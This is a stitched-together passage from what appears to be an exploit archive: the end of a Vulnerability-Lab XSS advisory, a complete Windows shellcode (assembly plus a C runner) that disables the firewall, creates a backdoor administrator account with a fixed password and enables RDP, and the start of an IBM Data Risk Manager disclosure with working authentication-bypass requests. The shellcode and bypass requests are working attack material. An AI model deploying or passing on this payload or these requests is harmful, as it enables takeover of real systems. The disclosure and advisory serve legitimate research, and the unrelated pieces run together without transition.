vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2
-
https://localhost:8080/project/loginsystem/admin/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer:
https://localhost:8080/project/loginsystem/admin/update-profile.php?uid=574
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4
-
GET: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-cache, must-revalidate, max-age=0
link: <https://localhost:8080/wp-json/>; rel="https://api.w.org/"
content-encoding: gzip
vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2


Reference(s):
https://localhost:8080/project/
https://localhost:8080/project/loginsystem/
https://localhost:8080/project/loginsystem/admin/
https://localhost:8080/project/loginsystem/admin/manage-users.php
https://localhost:8080/project/loginsystem/admin/update-profile.php


Solution - Fix & Patch:
=======================
The vulnerability can be patched following the next steps ...
1. Parse and sanitize the fname and lname parameters in the registration
request
2. Restrict the input and registration process using special chars and
other malformed contents
3. Sanitize the output in the update-profile.php and manage-users.php
file location


Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the web-application are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

## Exploit Title: Windows/x86 - MSVCRT System - Dynamic Null-free - Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
## Exploit Author: Bobby Cooke
## Date: 2020-04-20
## Tested on:   Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators'& 'Remote Desktop Users', and then enables the RDP Service.
## Commands used:
##  'netsh firewall set opmode mode=DISABLE'
##  'net user MajinBuu TurnU2C@ndy!! /add'
##  'net localgroup Administrators MajinBuu /add'
##  'net localgroup "Remote Desktop Users" MajinBuu /add'
##  'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

; Create stack frame
mov ebp, esp
sub esp, 0x30

; Find kernel32.dll base address
 xor ebx, ebx
 mov ebx, [fs:ebx+0x30]  ; EBX = Address_of_PEB
 mov ebx, [ebx+0xC]      ; EBX = Address_of_LDR
 mov ebx, [ebx+0x1C]     ; EBX = 1st entry in InitOrderModuleList / ntdll.dll
 mov ebx, [ebx]          ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll
 mov ebx, [ebx]          ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll
 mov eax, [ebx+0x8]      ; EAX = &kernel32.dll / Address of kernel32.dll
 mov [ebp-0x4], eax      ; [EBP-0x04] = &kernel32.dll

; Find the address of the Export Table within kernel32.dll
 mov ebx, [eax+0x3C]     ; EBX = Offset NewEXEHeader
 add ebx, eax            ; EBX = &NewEXEHeader
 mov ebx, [ebx+0x78]     ; EBX = RVA ExportTable
 add ebx, eax            ; EBX = &ExportTable

; Find the address of the Name Pointer Table within kernel32.dll
 mov edi, [ebx+0x20]     ; EDI = RVA NamePointerTable
 add edi, eax            ; EDI = &NamePointerTable
 mov [ebp-0x8], edi      ; save &NamePointerTable to stack frame

; Find the address of the Ordinal Table
 mov ecx, [ebx+0x24]     ; ECX = RVA OrdinalTable
 add ecx, eax            ; ECX = &OrdinalTable
 mov [ebp-0xC], ecx      ; save &OrdinalTable to stack-frame

; Find the address of the Address Table
 mov edx, [ebx+0x1C]     ; EDX = RVA AddressTable
 add edx, eax            ; EDX = &AddressTable
 mov [ebp-0x10], edx     ; save &AddressTable to stack-frame

; Find Number of Functions within the Export Table of kernel32.dll
 mov edx, [ebx+0x14]     ; EDX = Number of Functions
 mov [ebp-0x14], edx     ; save value of Number of Functions to stack-frame

jmp short functions

findFunctionAddr:
; Initialize the Counter to prevent infinite loop
 xor eax, eax            ; EAX = Counter = 0
 mov edx, [ebp-0x14]     ; get value of Number of Functions from stack-frame
; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll
searchLoop:
 mov edi, [ebp-0x8]      ; EDI = &NamePointerTable
 mov esi, [ebp-0x18]     ; ESI = Address of String for the Symbol we are searching for 
 xor ecx, ecx            ; ECX = 0x00000000
 cld                     ; clear direction flag - Process strings from left to right
 mov edi, [edi+eax*4]    ; EDI = RVA NameString      = [&NamePointerTable + (Counter * 4)]
 add edi, [ebp-0x4]      ; EDI = &NameString         = RVA NameString + &kernel32.dll
 add cx, 0xF             ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null
 repe cmpsb              ; compare first 8 bytes of [&NameString] to "GetProcAddress,0x00"
 jz found                ; If string at [&NameString] == "GetProcAddress,0x00", then end loop
 inc eax                 ; else Counter ++
 cmp eax, edx            ; Does EAX == Number of Functions?
 jb searchLoop           ;   If EAX != Number of Functions, then restart the loop

found:
; Find the address of GetProcAddress by using the last value of the Counter
 mov ecx, [ebp-0xC]      ; ECX = &OrdinalTable
 mov edx, [ebp-0x10]     ; EDX = &AddressTable
 mov ax,  [ecx + eax*2]  ;  AX = ordinalNumber      = [&OrdinalTable + (Counter*2)]
 mov eax, [edx + eax*4]  ; EAX = RVA GetProcAddress = [&AddressTable + ordinalNumber]
 add eax, [ebp-0x4]      ; EAX = &GetProcAddress    = RVA GetProcAddress + &kernel32.dll
 ret

functions:
# Push string "GetProcAddress",0x00 onto the stack
 xor eax, eax            ; clear eax register
 mov ax, 0x7373          ; AX is the lower 16-bits of the 32bit EAX Register
 push eax                ;   ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"
 push 0x65726464         ; erdd : 65726464 // "GetProcAddress"
 push 0x41636f72         ; Acor : 41636f72
 push 0x50746547         ; PteG : 50746547
 mov [ebp-0x18], esp      ; save PTR to string at bottom of stack (ebp)
 call findFunctionAddr   ; After Return EAX will = &GetProcAddress
# EAX = &GetProcAddress
 mov [ebp-0x1C], eax      ; save &GetProcAddress

; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
 xor edx, edx            ; EDX = 0x00000000
 push edx                ; null terminator for LoadLibraryA string
 push 0x41797261         ; Ayra : 41797261 // "LoadLibraryA",0x00
 push 0x7262694c         ; rbiL : 7262694c
 push 0x64616f4c         ; daoL : 64616f4c
 push esp                ; $hModule    -- push the address of the start of the string onto the stack
 push dword [ebp-0x4]    ; $lpProcName -- push base address of kernel32.dll to the stack
 mov eax, [ebp-0x1C]     ; Move the address of GetProcAddress into the EAX register
 call eax                ; Call the GetProcAddress Function.
 mov [ebp-0x20], eax     ; save Address of LoadLibraryA 

; Call LoadLibraryA(PTR "msvcrt")
;   push "msvcrt",0x00 to the stack and save pointer
 xor eax, eax            ; clear eax
 mov ax, 0x7472          ; tr : 7472
 push eax
 push 0x6376736D         ; cvsm : 6376736D
 push esp                ; push the pointer to the string
 mov ebx, [ebp-0x20]     ; LoadLibraryA Address to ebx register
 call ebx                ; call the LoadLibraryA Function to load msvcrt.dll
 mov [ebp-0x24], eax     ; save Address of msvcrt.dll

; Call GetProcAddress(msvcrt.dll, "system")
 xor edx, edx
 mov dx, 0x6d65          ; me : 6d65
 push edx
 push 0x74737973         ; tsys : 74737973
 push esp                ; push pointer to string to stack for 'system'
 push dword [ebp-0x24]   ; push base address of msvcrt.dll to stack
 mov eax, [ebp-0x1C]     ; PTR to GetProcAddress to EAX
 call eax                ; GetProcAddress
;   EAX = WSAStartup Address 
 mov [ebp-0x28], eax     ; save Address of msvcrt.system

; 'netsh firewall set opmode mode=DISABLE'
xor ecx, ecx
mov cx, 0x454c     ; EL : 454c
push ecx
push 0x42415349    ; BASI : 42415349
push 0x443d6564    ; D=ed : 443d6564
push 0x6f6d2065    ; om e : 6f6d2065
push 0x646f6d70    ; domp : 646f6d70
push 0x6f207465    ; o te : 6f207465
push 0x73206c6c    ; s ll : 73206c6c
push 0x61776572    ; awer : 61776572
push 0x69662068    ; if h : 69662068
push 0x7374656e    ; sten : 7374656e
push esp            ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax            ; call system

; 'net user MajinBuu TurnU2C@ndy!! /add'
xor ecx, ecx
push ecx
push 0x6464612f     ; dda/ : 6464612f
push 0x20212179     ;  !!y : 20212179
push 0x646e4043     ; dn@C : 646e4043
push 0x32556e72     ; 2Unr : 32556e72
push 0x75542075     ; uT u : 75542075
push 0x75426e69     ; uBni : 75426e69
push 0x6a614d20     ; jaM  : 6a614d20
push 0x72657375     ; resu : 72657375
push 0x2074656e     ;  ten : 2074656e
push esp            ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax            ; call system

; 'net localgroup Administrators MajinBuu /add'
xor ecx, ecx
push ecx
mov ecx, 0x64646190 ; dda : 646461
shr ecx, 8
push ecx
push 0x2f207575     ; / uu : 2f207575
push 0x426e696a     ; Bnij : 426e696a
push 0x614d2073     ; aM s : 614d2073
push 0x726f7461     ; rota : 726f7461
push 0x72747369     ; rtsi : 72747369
push 0x6e696d64     ; nimd : 6e696d64
push 0x41207075     ; A pu : 41207075
push 0x6f72676c     ; orgl : 6f72676c
push 0x61636f6c     ; acol : 61636f6c
push 0x2074656e     ;  ten : 2074656e
push esp            ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax            ; call system

; 'net localgroup "Remote Desktop Users" MajinBuu /add'
xor ecx, ecx
push ecx
mov ecx, 0x64646190 ; dda : 646461
shr ecx, 8
push ecx
push 0x2f207575     ; / uu : 2f207575
push 0x426e696a     ; Bnij : 426e696a
push 0x614d2022     ; aM " : 614d2022
push 0x73726573     ; sres : 73726573
push 0x5520706f     ; U po : 5520706f
push 0x746b7365     ; tkse : 746b7365
push 0x44206574     ; D et : 44206574
push 0x6f6d6552     ; omeR : 6f6d6552
push 0x22207075     ; " pu : 22207075
push 0x6f72676c     ; orgl : 6f72676c
push 0x61636f6c     ; acol : 61636f6c
push 0x2074656e     ;  ten : 2074656e
push esp            ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax            ; call system

; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
xor ecx, ecx
push ecx
push 0x662f2030    ; f/ 0 : 662f2030
push 0x20642f20    ;  d/  : 20642f20
push 0x44524f57    ; DROW : 44524f57
push 0x445f4745    ; D_GE : 445f4745
push 0x5220742f    ; R t/ : 5220742f
push 0x20736e6f    ;  sno : 20736e6f
push 0x69746365    ; itce : 69746365
push 0x6e6e6f43    ; nnoC : 6e6e6f43
push 0x5354796e    ; STyn : 5354796e
push 0x65446620    ; eDf  : 65446620
push 0x762f2022    ; v/ " : 762f2022
push 0x72657672    ; revr : 72657672
push 0x6553206c    ; eS l : 6553206c
push 0x616e696d    ; anim : 616e696d
push 0x7265545c    ; reT\ : 7265545c
push 0x6c6f7274    ; lort : 6c6f7274
push 0x6e6f435c    ; noC\ : 6e6f435c
push 0x7465536c    ; teSl : 7465536c
push 0x6f72746e    ; ortn : 6f72746e
push 0x6f43746e    ; oCtn : 6f43746e
push 0x65727275    ; erru : 65727275
push 0x435c4d45    ; C\ME : 435c4d45
push 0x54535953    ; TSYS : 54535953
push 0x5c454e49    ; \ENI : 5c454e49
push 0x4843414d    ; HCAM : 4843414d
push 0x5f4c4143    ; _LAC : 5f4c4143
push 0x4f4c5f59    ; OL_Y : 4f4c5f59
push 0x454b4822    ; EKH" : 454b4822
push 0x20646461    ;  dda : 20646461
push 0x20676572    ;  ger : 20676572
push esp            ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax            ; call system


######################################################################################
#include <windows.h>
#include <stdio.h>

char code[] = \
"\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b"
"\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7"
"\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53"
"\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b"
"\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4"
"\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50"
"\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff"
"\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f"
"\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50"
"\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52"
"\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9"
"\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d"
"\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66"
"\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68"
"\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69"
"\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45"
"\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68"
"\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64"
"\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65"
"\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68"
"\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f"
"\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70"
"\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8"
"\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68"
"\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43"
"\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76"
"\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f"
"\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f"
"\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68"
"\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61"
"\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0";

int main(int argc, char **argv)
{
  int (*func)();
  func = (int(*)()) code;
  (int)(*func)();
}

# Multiple Vulnerabilities in IBM Data Risk Manager

### By Pedro Ribeiro (pedrib@gmail.com) from [Agile Information Security](https://agileinfosec.co.uk)

#### Disclosure Date: 21/04/2020 | Last Updated: 21/04/2020  

## Introduction
[From the vendor's website](https://www.ibm.com/products/data-risk-manager):  
*What you don’t know can hurt you. Identify and help prevent risks to sensitive business data that may impact business processes, operations, and competitive position. IBM Data Risk Manager provides executives and their teams a business-consumable data risk control center that helps to uncover, analyze, and visualize data-related business risks so they can take action to protect their business.*

## Summary
**tl;dr scroll to the bottom to see videos of the exploits in action**

IBM Data Risk Manager (IDRM) is an enterprise security software by IBM that aggregates and provides a full view of all the enterprise security risks, akin to an electronic risk register.  
The product receives information feeds from vulnerability scanning tools and other risk management tools, aggregates them and allows a user to investigate them and perform comprehensive analysis.

The IDRM Linux virtual appliance was analysed and it was found to contain four vulnerabilities, three critical risk and one high risk:  

* Authentication Bypass  
* Command Injection
* Insecure Default Password
* Arbitrary File Download 

This advisory describes the four vulnerabilities and the steps necessary to chain the first three to achieve unauthenticated remote code execution as root. In addition, two Metasploit modules that bypass authentication and exploit the [remote code execution](https://github.com/rapid7/metasploit-framework/pull/13300) and [arbitrary file download](https://github.com/rapid7/metasploit-framework/pull/13301) are being released to the public.

At the time of disclosure, it is unclear if the latest version 2.0.6 is affected by these, but most likely it is, as there is no mention of fixed vulnerabilities in any changelog, and it was released before the *attempt* to report these vulnerabilities to IBM. The latest version Agile InfoSec has access to is 2.0.3, and that one is certainly vulnerable.  

### Here's a bunch of 0 days!

At the time of disclosure these vulnerabilities are **"0 days"**. An attempt was made to contact [CERT/CC](https://www.kb.cert.org/vuls/) to coordinate disclosure with IBM, but IBM **REFUSED** to accept the vulnerability report, and responded to CERT/CC with:  

***we have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for "enhanced" support paid for by our customers**. This is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within 6 months prior to submitting a report.*

This is an unbelievable response by IBM, a multi billion dollar company that is **selling security enterprise products and security consultancy** to huge corporations worldwide. They refused to accept a free high quality vulnerability report on one of their products, while putting ludicrous quotes like the following [on their website](https://www.ibm.com/security):

*When every second counts, you need a unified defense to identify, orchestrate and automate your response to threats. IBM Security Threat Management solutions help you thrive in the face of cyber uncertainty.*

*Building a custom security plan that is both industry-specific and aligned to your security maturity demands a partner with deep expertise and global reach. The IBM Security Strategy and Risk services team is that valued partner.*

It should be noted that IBM offers no bounties on their "bug bounty program", just kudos:

![Kudos](./kudos.jpeg)

In any case, I did not ask or expect a bounty since I do not have a HackerOne account and I don't agree with HackerOne's or IBM's disclosure terms there. 
I simply wanted to disclose these to IBM responsibly and let them fix it.

### So many questions...
IDRM is an enterprise security product that handles very sensitive information. The hacking of an IDRM appliance might lead to a full scale company compromise, as it stores credentials to access other security tools, not to mention it contains information about critical vulnerabilities that affect the company.

* Why did IBM refuse to accept a **FREE** detailed vulnerability report?
* What does their answer mean? Are the only accepting vulnerability reports from customers?
* Or is the product out of support? If so, why is still being offered for sale to new customers?
* How can they be so irreponsible while selling an enterprise security product?

Anyway, with this out of the way let's get technical...

## Vulnerability Details

### #1: Authentication Bypass
* [CWE-287: Improper Authentication](https://cwe.mitre.org/data/definitions/287.html)
* CVE-TODO (not assigned yet)
* Risk Classification: Critical
* Attack Vector: Remote
* Constraints: None / N/A
* Affected Products / Versions:
  * IBM Data Risk Manager 2.0.1 to 2.0.3 confirmed to be vulnerable
  * IBM Data Risk Manager 2.0.4 to 2.0.6 likely to be vulnerable

#### Details:
IDRM has an API endpoint at */albatross/saml/idpSelection* that associates an ID provided by the attacker with a valid user on the system. The method that handles this endpoint is shown below:

```java
  @RequestMapping(value={"/saml/idpSelection"}, method={RequestMethod.GET})
  public String idpSelection(HttpServletRequest httpRequest, HttpServletResponse httpResponse, Model model, @RequestParam(value="id", required=false) String sessionId, @RequestParam(value="userName", required=false) String userName, RedirectAttributes rattrs) {
    List allUrls = this.a3repository.getA3AllUrlsRepository().findByTypeAndIsDeletedAndGuardiumType(A3Constants.A3_URL_TYPE.MICROSERVICES.getValue(), A3Constants.INT_ZERO, A3Constants.A3_MICROSERVICE_TYPE.IDENTITY_MANAGER.getValue());
    if (allUrls == null || allUrls.size() == 0) {
      rattrs.addAttribute("message", (Object)"Microservice instance is not running or more than one instance is running, please start the microservice and try again");
      return "redirect:/error";
    }
    if (allUrls.size() == 1) {
      A3AllUrls aUrl = (A3AllUrls)allUrls.get(0);
      String url = aUrl.getUrl();
      if (userName == null || userName.equals("")) {
        rattrs.addAttribute("message", (Object)"Enter the user name, please try again");
        return "redirect:/error";
      }
      if (sessionId == null || sessionId.equals("")) {
        rattrs.addAttribute("message", (Object)"Session ID is not present, please try again");
        return "redirect:/error";
      }
      A3User user = this.a3repository.getA3userService().findA3UserByUserNameIgnoreCaseAndIsDeleted(userName, A3Constants.INT_ZERO);
      if (user == null) {
        rattrs.addAttribute("message", (Object)("User " + userName + " account not present in IDRM, please create the account and try again"));
        return "redirect:/error";
      }
      user.setSessionId(sessionId);
      user.setLastUpdate(null);
      this.a3repository.getA3userService().save((Object)user);
      String page = null;
      page = url.endsWith("/") ? "redirect:" + url + "saml/idpSelection" : "redirect:" + url + "/saml/idpSelection";
      return page;
    }
    return "redirect:/error";
  }

```

As it can be seen in the code above, this method accepts an arbitrary *sessionId* and *username* parameters from the HTTP request, and if *username* exists on the application's user database, it then associates that *sessionId* to the *username*.  
This can be achieved by an unauthenticated attacker with the following request:
```
GET /albatross/saml/idpSelection?id=SOMETHING&userName=admin
```

The server will respond with a 302 redirect to https://localhost:8765/saml/idpSelection, but that doesn't really matter. This action might not make sense now, but read on.

The API endpoint */albatross/user/login* is handled by the following method (only the relevant snippets are shown):
```java
   @RequestMapping(value={"/user/login"}, method={RequestMethod.POST}, consumes={"multipart/form-data"})
    public A3StatusBean userLogin(HttpServletRequest httpRequest, @RequestParam(value="username", required=true) String username, @RequestParam(value="deviceid") String deviceId, @RequestParam(value="password", required=false) String password, @RequestParam(value="sessionId", required=false) String sessionId, @RequestParam(value="clientDetails", required=true) String clientDetails) {
        (...)
                A3User user = this.a3repository.getA3userService().findA3UserByUserNameIgnoreCase(username);
                if (user != null) {
                    if (sessionId != null) {
                        if (sessionId.equals(user.getSessionId())) {
        (...)
                            LOGGER.log(A3Constants.A3LOG, "Session is matching, so user is valid");
                            response.setRequestedUrl(A3Utils.getWebURLWithQueryString((HttpServletRequest)httpRequest));
                            response.setHttpStatus(Integer.toString(HttpStatus.OK.value()));
                            response.setServerCode(Integer.toString(A3FullStackResponseConstants.SUCCESS));
                            if (this.userMap.get(user.getUserId()) == null) {
                                user.setSessionId(null);
                                String randomPwd = UUID.randomUUID().toString();
                                user.setPassword(A3BcryptUtil.getBCryptHash(randomPwd));
                                this.a3repository.getA3userService().save((Object)user);
                                this.userMap.put(user.getUserId(), randomPwd);
                                response.setData((Object)randomPwd);
                            } else {
                                String tPassword = this.userMap.get(user.getUserId());
                                user.setPassword(A3BcryptUtil.getBCryptHash(tPassword));
                                this.a3repository.getA3userService().save((Object)user);
                                response.setData((Object)tPassword);
                            }
                            return response;
                        }
        (...)
    }
```

The method listed above takes the *username* and *sessionId* parameters, and checks if *username* exists in the database and *sessionId* is associated with that *username*. If it is, the application returns a newly generated random password for that username.  
In the previous request, the "*admin"* user was associated with the *sessionId "SOMETHING"*. So now if we perform the following request:
```
POST /albatross/user/login HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_224_2171658712_4042463386
Content-Length: 509
Connection: close

--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="deviceid"


--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="password"

< ... any string can be sent here ... >
--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="username"

admin
--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="clientDetails"


--_Part_224_2171658712_4042463386
Content-Disposition: form-data; name="sessionId"

SOMETHING
--_Part_224_2171658712_4042463386--

```

The server will respond with:
```
{"httpStatus":"200","serverCode":"2001","requestedUrl":"https://10.0.10.25:8443/albatross/user/login","data":"b6e1a82b-3f33-4297-86e1-ca780d16cb02"}
```

... which is now a valid password for the *"admin"* user, as the previous snippet of code shows.

So now let's try and authenticate using that as a password:
```
POST /albatross/user/login HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_122_4062871012_3985537084
Content-Length: 435
Connection: close

--_Part_122_4062871012_3985537084
Content-Disposition: form-data; name="deviceid"


--_Part_122_4062871012_3985537084
Content-Disposition: form-data; name="password"

b6e1a82b-3f33-4297-86e1-ca780d16cb02
--_Part_122_4062871012_3985537084
Content-Disposition: form-data; name="username"

admin
--_Part_122_4062871012_3985537084
Content-Disposition: form-data; name="clientDetails"


--_Part_122_4062871012_3985537084--
```

To which the server responds with:
```
{"httpStatus":"200","serverCode":"2001","requestedUrl":"https://10.0.10.25:8443/albatross/user/login","data":{"access_token":"3b5b0fa6-2d46-4104-ba38-54a077d05a93","token_type":"bearer","expires_in":28799,"scope":"read write"}}
```

Success! We now have a valid Bearer administrative token that can be used to access various API. It's also possible to login as a normal web user on the */albatross/login* endpoint, which will yield an authenticated cookie instead of a token, allowing access to the web administration console. In any case, as this shows, authentication is now completely bypassed and we have full administrative access to IDRM.

It should be noted that this is a destructive action - the previous admin password will be invalid, and only the new password which is generated above can be used to login as an admin. So this works a bit like a *"password reset"*, even though it is not named as such.


### #2: Command Injection
* [CWE-77: Command Injection](https://cwe.mitre.org/data/definitions/77.html)
* CVE-TODO (not assigned yet)
* Risk Classification: Critical
* Attack Vector: Remote
* Constraints: Authentication Required
* Affected Products / Versions:
  * IBM Data Risk Manager 2.0.1 to 2.0.3 confirmed to be vulnerable
  * IBM Data Risk Manager 2.0.4 to 2.0.6 likely to be vulnerable

#### Details:
IDRM exposes an API at */albatross/restAPI/v2/nmap/run/scan* that allows an authenticated user to perform nmap scans. The call stack and relevant code is pasted below:

```java
  @RequestMapping(value={"/run/nmap/scan"}, method={RequestMethod.POST})
  public A3StatusBean runNmapScan(HttpServletRequest httpRequest, @RequestParam(value="transaction", required=false) String transactionData, @RequestParam(value="accessToken") String accessToken, @RequestParam(value="userId", required=false) String userName) {

          (...)
          runNmapScan invokes A3CustomScriptScanTask.run() 

                A3CustomScriptScanTask.run() invokes A3IpScannerUtils.runNmapOnIpAddress()

                        public static A3ExtAppNmapHostDTO runNmapOnIpAddress(String nmapPath, String nmapOptions, String ipAddress, String portRange) throws IOException, InterruptedException {
                                String[] nmapOpts;
                                A3ExtAppNmapHostDTO nmapHost = null;
                                LOGGER.log(A3EurekaConstants.OPERATIONAL, "Running nmap Scan");
                                ArrayList<String> command = new ArrayList<String>();
                                command.add(nmapPath);
                                for (String nmapOpt : nmapOpts = nmapOptions.split("")) {
                                        command.add(nmapOpt);
                                }
                                command.add(ipAddress);
                                Process process = null;
                                if (portRange != null && !portRange.equals("")) {
                                        command.add("-p");
                                        command.add(portRange);
                                        process = Runtime.getRuntime().exec(command.toArray(new String[command.size()]));
                                } else {
